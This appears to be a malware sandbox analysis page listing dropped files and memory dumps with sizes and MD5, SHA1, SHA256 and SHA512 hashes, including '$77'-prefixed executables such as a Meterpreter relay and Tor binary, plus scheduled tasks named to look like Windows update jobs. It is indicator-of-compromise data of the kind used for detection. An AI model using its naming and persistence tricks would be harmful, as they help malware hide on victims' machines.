1a7d1b5d24ba30c4d3d5502295ab5e89

SHA1
2d5e69cf335605ba0a61f0bbecbea6fc06a42563

SHA256
b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5

SHA512
859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

Download Submit
C:\Windows\$77driver\$77master.exe

Filesize
8.9MB

MD5
c8aed7f2c31fdf5978c94159ea6e2c25

SHA1
42c1b533abda8083b4c6405af33b405dea7ad421

SHA256
1ad6c91825f9ad0179bc20f4f53d5f2c0860270d251aa23c8a607b1e2cde35ec

SHA512
2f9a498bc1da80a8ed8eaae9ea836d8ff6a69b52f231402523c2b4fc34643335985ffb77933d7e8c3f1b48227f920aa3d07182561e0178af48d447c3f0d137ba

Download Submit
C:\Windows\$77driver\$77securerelay.exe

Filesize
250KB

MD5
9e878aa8190d6a17e4bbd0b97d49bd04

SHA1
6e3c969aa91c374b0d0dace0f0bf299fa2116f1d

SHA256
7e4c8952e0caac9829fdd5edfc80ebc0ed79d18a464230a1896d7a1257f6ddab

SHA512
3192187004d6f5039d13ed7f9f8462b3868c48f60878a8741bb12c9cc89d3735d631da365c2373eb90778b39427e2bd714cf0f3291e4b3ae1cd1854c320299e8

Download Submit
C:\Windows\$77driver\$77securerelayMeterpreter.exe

Filesize
164KB

MD5
c4481af0806aa45f6f60cb2696bda08f

SHA1
693aa58b1e5417b200a4d2d871f90cf4b721b3d2

SHA256
47d9dc3285d08eaf0ec3519a731483a65462a7d5b71897064da962f43fa79e05

SHA512
7ace15d9ee5687cb33276777c3e3c94fc5e80782718bc21d8a552c4421c67abdb44984eb1a12ce0a64f10c31cbef3243086bb4b2b8ffa8e76ec917d92876a6f2

Download Submit
C:\Windows\$77driver\$77tor.exe

Filesize
8.2MB

MD5
98e61b0349680d5630548911e355bcad

SHA1
ae47d8e3552a8adcb8670ce0c1fb45677510a8c3

SHA256
4dc2054d3023f671df5cd839a1080cba34e8d764897ace57535dcef6b1c11bf5

SHA512
232b8b0e327a683c5890129d5bf80fd52880f650ef1310e2d2fe5408438eb05e2d9c61d8c6cd7f40fb90bcc9b83dfc07fa5fcb3d1744daaef6f7467a3c8edca9

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/392-200-0x0000013DF5DC0000-0x0000013DF5DEB000-memory.dmp

Filesize
172KB

Download
memory/616-163-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

Filesize
64KB

Download
memory/616-153-0x000001EA278B0000-0x000001EA278D5000-memory.dmp

Filesize
148KB

Download
memory/616-156-0x000001EA278E0000-0x000001EA2790B000-memory.dmp

Filesize
172KB

Download
memory/616-162-0x000001EA278E0000-0x000001EA2790B000-memory.dmp

Filesize
172KB

Download
memory/616-154-0x000001EA278E0000-0x000001EA2790B000-memory.dmp

Filesize
172KB

Download
memory/676-174-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

Filesize
64KB

Download
memory/676-173-0x00000290A7490000-0x00000290A74BB000-memory.dmp

Filesize
172KB

Download
memory/676-167-0x00000290A7490000-0x00000290A74BB000-memory.dmp

Filesize
172KB

Download
memory/952-141-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/952-142-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/952-148-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

Filesize
760KB

Download
memory/952-147-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

Filesize
2.0MB

Download
memory/952-144-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/952-143-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/952-146-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/952-150-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/956-179-0x0000027FCEFA0000-0x0000027FCEFCB000-memory.dmp

Filesize
172KB

Download
memory/956-184-0x0000027FCEFA0000-0x0000027FCEFCB000-memory.dmp

Filesize
172KB

Download
memory/956-185-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

Filesize
64KB

Download
memory/1016-189-0x000001F5B8B00000-0x000001F5B8B2B000-memory.dmp

Filesize
172KB

Download
memory/1016-195-0x000001F5B8B00000-0x000001F5B8B2B000-memory.dmp

Filesize
172KB

Download
memory/1016-196-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp

Filesize
64KB

Download
memory/1820-1074-0x00007FF7E14D0000-0x00007FF7E1510000-memory.dmp

Filesize
256KB

Download
memory/2468-1027-0x00007FF762B70000-0x00007FF762BB0000-memory.dmp

Filesize
256KB

Download
memory/2488-120-0x0000000007E40000-0x0000000007E54000-memory.dmp

Filesize
80KB

Download
memory/2488-107-0x0000000006E50000-0x0000000006E9C000-memory.dmp

Filesize
304KB

Download
memory/2488-105-0x0000000006230000-0x0000000006584000-memory.dmp

Filesize
3.3MB

Download
memory/2488-119-0x0000000007E00000-0x0000000007E11000-memory.dmp

Filesize
68KB

Download
memory/2488-118-0x0000000007B70000-0x0000000007C13000-memory.dmp

Filesize
652KB

Download
memory/2488-108-0x000000006F9D0000-0x000000006FA1C000-memory.dmp

Filesize
304KB

Download
memory/2528-1019-0x00007FF6423B0000-0x00007FF6423F0000-memory.dmp

Filesize
256KB

Download
memory/2528-1016-0x00007FF6423B0000-0x00007FF6423F0000-memory.dmp

Filesize
256KB

Download
memory/4136-1043-0x00007FF6AE2C0000-0x00007FF6AE300000-memory.dmp

Filesize
256KB

Download
memory/4324-20-0x0000000006330000-0x0000000006362000-memory.dmp

Filesize
200KB

Download
memory/4324-34-0x00000000732C0000-0x0000000073A70000-memory.dmp

Filesize
7.7MB

Download
memory/4324-46-0x00000000732C0000-0x0000000073A70000-memory.dmp

Filesize
7.7MB

Download
memory/4324-43-0x00000000073A0000-0x00000000073A8000-memory.dmp

Filesize
32KB

Download
memory/4324-42-0x00000000073C0000-0x00000000073DA000-memory.dmp

Filesize
104KB

Download
memory/4324-40-0x00000000072B0000-0x00000000072BE000-memory.dmp

Filesize
56KB

Download
memory/4324-41-0x00000000072C0000-0x00000000072D4000-memory.dmp

Filesize
80KB

Download
memory/4324-39-0x0000000007280000-0x0000000007291000-memory.dmp

Filesize
68KB

Download
memory/4324-38-0x0000000007300000-0x0000000007396000-memory.dmp

Filesize
600KB

Download
memory/4324-37-0x00000000070F0000-0x00000000070FA000-memory.dmp

Filesize
40KB

Download
memory/4324-35-0x00000000076D0000-0x0000000007D4A000-memory.dmp

Filesize
6.5MB

Download
memory/4324-36-0x0000000007080000-0x000000000709A000-memory.dmp

Filesize
104KB

Download
memory/4324-1-0x0000000002770000-0x00000000027A6000-memory.dmp

Filesize
216KB

Download
memory/4324-32-0x0000000006310000-0x000000000632E000-memory.dmp

Filesize
120KB

Download
memory/4324-33-0x0000000006D60000-0x0000000006E03000-memory.dmp

Filesize
652KB

Download
memory/4324-0-0x00000000732CE000-0x00000000732CF000-memory.dmp

Filesize
4KB

Download
memory/4324-21-0x00000000732C0000-0x0000000073A70000-memory.dmp

Filesize
7.7MB

Download
memory/4324-22-0x000000006FB50000-0x000000006FB9C000-memory.dmp

Filesize
304KB

Download
memory/4324-19-0x0000000005D90000-0x0000000005DDC000-memory.dmp

Filesize
304KB

Download
memory/4324-18-0x0000000005D60000-0x0000000005D7E000-memory.dmp

Filesize
120KB

Download
memory/4324-8-0x0000000005750000-0x0000000005AA4000-memory.dmp

Filesize
3.3MB

Download
memory/4324-6-0x0000000005670000-0x00000000056D6000-memory.dmp

Filesize
408KB

Download
memory/4324-7-0x00000000056E0000-0x0000000005746000-memory.dmp

Filesize
408KB

Download
memory/4324-5-0x00000000055D0000-0x00000000055F2000-memory.dmp

Filesize
136KB

Download
memory/4324-4-0x00000000732C0000-0x0000000073A70000-memory.dmp

Filesize
7.7MB

Download
memory/4324-2-0x0000000004F00000-0x0000000005528000-memory.dmp

Filesize
6.2MB

Download
memory/4324-3-0x00000000732C0000-0x0000000073A70000-memory.dmp

Filesize
7.7MB

Download
memory/4488-138-0x000001F925770000-0x000001F92579A000-memory.dmp

Filesize
168KB

Download
memory/4488-128-0x000001F924A20000-0x000001F924A42000-memory.dmp

Filesize
136KB

Download
memory/4488-139-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp

Filesize
2.0MB

Download
memory/4488-140-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp

Filesize
760KB

Download
memory/4788-1087-0x00007FF66F000000-0x00007FF66F040000-memory.dmp

Filesize
256KB

Download